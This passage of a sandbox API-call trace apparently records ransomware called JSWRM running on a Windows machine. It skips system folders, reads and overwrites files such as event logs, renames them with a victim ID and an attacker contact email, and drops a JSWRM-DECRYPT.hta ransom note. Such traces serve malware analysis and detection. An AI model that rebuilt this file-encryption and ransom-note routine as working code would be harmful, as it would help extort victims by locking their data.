0xffffffff [0064.822] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0064.822] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f9a4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8, lpNumberOfBytesRead=0x345f9a4*=0x0, lpOverlapped=0x0) returned 0 [0064.822] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0064.823] CloseHandle (hObject=0xffffffff) returned 1 [0064.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0064.823] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0064.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0064.823] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8638, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0064.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8670 [0064.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0064.823] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0064.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a480 [0064.823] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a480, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0064.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a480 | out: hHeap=0x1e0000) returned 1 [0064.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0064.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x236c78 [0064.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0064.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209698 [0064.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236c78 | out: hHeap=0x1e0000) returned 1 [0064.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x217880 [0064.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209698 | out: hHeap=0x1e0000) returned 1 [0064.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8670 | out: hHeap=0x1e0000) returned 1 [0064.823] MoveFileW (lpExistingFileName="C:\\hiberfil.sys" (normalized: "c:\\hiberfil.sys"), lpNewFileName="C:\\hiberfil.sys.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\hiberfil.sys.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0064.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x217880 | out: hHeap=0x1e0000) returned 1 [0064.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0064.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0064.823] FindNextFileW (in: hFindFile=0x231d80, lpFindFileData=0x345fa30 | out: lpFindFileData=0x345fa30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19513b11, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x19513b11, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x19513b11, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0064.823] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0064.823] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0064.823] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0064.823] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0064.824] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0064.824] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0064.824] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0064.824] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0064.824] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0064.824] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0064.824] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0064.824] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0064.824] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0064.824] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241218, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0064.824] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0064.824] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0064.824] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0064.824] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f98 [0064.824] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240f98, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0064.824] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0064.824] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0064.824] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0064.824] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f98 | out: hHeap=0x1e0000) returned 1 [0064.824] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0064.824] FindNextFileW (in: hFindFile=0x231d80, lpFindFileData=0x345fa30 | out: lpFindFileData=0x345fa30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdf1d773, ftCreationTime.dwHighDateTime=0x1d1a04f, ftLastAccessTime.dwLowDateTime=0xa03727f1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xfd9ec80, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Logs", cAlternateFileName="")) returned 1 [0064.824] lstrcmpiW (lpString1="Logs", lpString2=".") returned 1 [0064.824] lstrcmpiW (lpString1="Logs", lpString2="..") returned 1 [0064.824] lstrcmpiW (lpString1="Logs", lpString2="...") returned 1 [0064.824] lstrcmpiW (lpString1="Logs", lpString2="windows") returned -1 [0064.824] lstrcmpiW (lpString1="Logs", lpString2="recovery") returned -1 [0064.824] lstrcmpiW (lpString1="Logs", lpString2="perflogs") returned -1 [0064.824] lstrcmpiW (lpString1="Logs", lpString2="documents and settings") returned 1 [0064.824] lstrcmpiW (lpString1="Logs", lpString2="$RECYCLE.BIN") returned 1 [0064.824] lstrcmpiW (lpString1="Logs", lpString2="system volume information") returned -1 [0064.824] lstrcmpiW (lpString1="Logs", lpString2="msocache") returned -1 [0064.824] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0064.824] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0064.825] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0064.825] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0064.825] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0064.825] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0064.825] GetFileAttributesW (lpFileName="C:\\Logs\\JSWRM-DECRYPT.hta" (normalized: "c:\\logs\\jswrm-decrypt.hta")) returned 0xffffffff [0064.829] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0064.829] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0064.829] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345c894, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0064.829] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0064.829] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23bc78 [0064.829] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0064.829] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x23da48 [0064.829] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23bc78 | out: hHeap=0x1e0000) returned 1 [0064.829] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0064.829] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0064.829] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0064.829] CreateFileW (lpFileName="C:\\Logs\\JSWRM-DECRYPT.hta" (normalized: "c:\\logs\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x44c [0064.831] SetFilePointer (in: hFile=0x44c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0064.831] WriteFile (in: hFile=0x44c, lpBuffer=0x345c9a8*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345c974, lpOverlapped=0x0 | out: lpBuffer=0x345c9a8*, lpNumberOfBytesWritten=0x345c974*=0x230c, lpOverlapped=0x0) returned 1 [0064.832] CloseHandle (hObject=0x44c) returned 1 [0064.833] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0064.833] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da48 | out: hHeap=0x1e0000) returned 1 [0064.834] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0064.834] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0064.834] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0064.834] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0064.834] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0064.834] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0064.834] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0064.834] GetFileAttributesW (lpFileName="C:\\Logs\\JSWRM-DECRYPT.hta" (normalized: "c:\\logs\\jswrm-decrypt.hta")) returned 0x20 [0064.834] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0064.835] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0064.835] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0064.835] FindFirstFileW (in: lpFileName="C:\\Logs\\*.*", lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdf1d773, ftCreationTime.dwHighDateTime=0x1d1a04f, ftLastAccessTime.dwLowDateTime=0xa03727f1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1d4cd83c, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x231dc0 [0064.835] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.835] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdf1d773, ftCreationTime.dwHighDateTime=0x1d1a04f, ftLastAccessTime.dwLowDateTime=0xa03727f1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1d4cd83c, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.841] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.842] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.842] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5052fa31, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5052fa31, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Application.evtx", cAlternateFileName="APPLIC~1.EVT")) returned 1 [0064.842] lstrcmpiW (lpString1="Application.evtx", lpString2=".") returned 1 [0064.842] lstrcmpiW (lpString1="Application.evtx", lpString2="..") returned 1 [0064.842] lstrcmpiW (lpString1="Application.evtx", lpString2="...") returned 1 [0064.842] lstrcmpiW (lpString1="Application.evtx", lpString2="windows") returned -1 [0064.842] lstrcmpiW (lpString1="Application.evtx", lpString2="recovery") returned -1 [0064.842] lstrcmpiW (lpString1="Application.evtx", lpString2="perflogs") returned -1 [0064.842] lstrcmpiW (lpString1="Application.evtx", lpString2="documents and settings") returned -1 [0064.842] lstrcmpiW (lpString1="Application.evtx", lpString2="$RECYCLE.BIN") returned 1 [0064.842] lstrcmpiW (lpString1="Application.evtx", lpString2="system volume information") returned -1 [0064.842] lstrcmpiW (lpString1="Application.evtx", lpString2="msocache") returned -1 [0064.842] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0064.842] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Application.evtx", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0064.842] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0064.842] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Application.evtx", cchWideChar=16, lpMultiByteStr=0x241010, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Application.evtx", lpUsedDefaultChar=0x0) returned 16 [0064.842] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0064.842] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0064.842] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Application.evtx", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0064.842] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0064.842] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Application.evtx", cchWideChar=16, lpMultiByteStr=0x241380, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Application.evtx", lpUsedDefaultChar=0x0) returned 16 [0064.842] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0064.842] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0064.842] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0064.842] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0064.842] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0064.842] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0064.842] CreateFileW (lpFileName="C:\\Logs\\Application.evtx" (normalized: "c:\\logs\\application.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0064.844] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=69632) returned 1 [0064.844] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0064.844] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11000) returned 0x2471a8 [0064.845] ReadFile (in: hFile=0x450, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesRead=0x345f63c*=0x11000, lpOverlapped=0x0) returned 1 [0064.851] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0064.851] WriteFile (in: hFile=0x450, lpBuffer=0x2471a8*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesWritten=0x345f638*=0x11000, lpOverlapped=0x0) returned 1 [0064.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0064.852] CloseHandle (hObject=0x450) returned 1 [0064.854] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0064.854] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0064.854] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0064.854] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f87c0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0064.854] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0064.854] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0064.854] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0064.854] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0064.854] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0064.854] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0064.854] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dec0 [0064.854] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5e) returned 0x233028 [0064.854] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dec0 | out: hHeap=0x1e0000) returned 1 [0064.854] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8c) returned 0x23b400 [0064.854] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233028 | out: hHeap=0x1e0000) returned 1 [0064.854] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0064.854] MoveFileW (lpExistingFileName="C:\\Logs\\Application.evtx" (normalized: "c:\\logs\\application.evtx"), lpNewFileName="C:\\Logs\\Application.evtx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\logs\\application.evtx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0064.855] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0064.855] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0064.855] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0064.855] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0064.855] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0064.855] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x505ee5f0, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x505ee5f0, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="HardwareEvents.evtx", cAlternateFileName="HARDWA~1.EVT")) returned 1 [0064.855] lstrcmpiW (lpString1="HardwareEvents.evtx", lpString2=".") returned 1 [0064.855] lstrcmpiW (lpString1="HardwareEvents.evtx", lpString2="..") returned 1 [0064.855] lstrcmpiW (lpString1="HardwareEvents.evtx", lpString2="...") returned 1 [0064.855] lstrcmpiW (lpString1="HardwareEvents.evtx", lpString2="windows") returned -1 [0064.855] lstrcmpiW (lpString1="HardwareEvents.evtx", lpString2="recovery") returned -1 [0064.855] lstrcmpiW (lpString1="HardwareEvents.evtx", lpString2="perflogs") returned -1 [0064.855] lstrcmpiW (lpString1="HardwareEvents.evtx", lpString2="documents and settings") returned 1 [0064.855] lstrcmpiW (lpString1="HardwareEvents.evtx", lpString2="$RECYCLE.BIN") returned 1 [0064.855] lstrcmpiW (lpString1="HardwareEvents.evtx", lpString2="system volume information") returned -1 [0064.855] lstrcmpiW (lpString1="HardwareEvents.evtx", lpString2="msocache") returned -1 [0064.855] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0064.855] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HardwareEvents.evtx", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0064.855] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0064.855] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HardwareEvents.evtx", cchWideChar=19, lpMultiByteStr=0x241268, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HardwareEvents.evtx", lpUsedDefaultChar=0x0) returned 19 [0064.855] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0064.855] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0064.855] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HardwareEvents.evtx", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0064.855] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0064.856] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HardwareEvents.evtx", cchWideChar=19, lpMultiByteStr=0x241330, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HardwareEvents.evtx", lpUsedDefaultChar=0x0) returned 19 [0064.856] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0064.856] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0064.856] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0064.856] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0064.856] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, 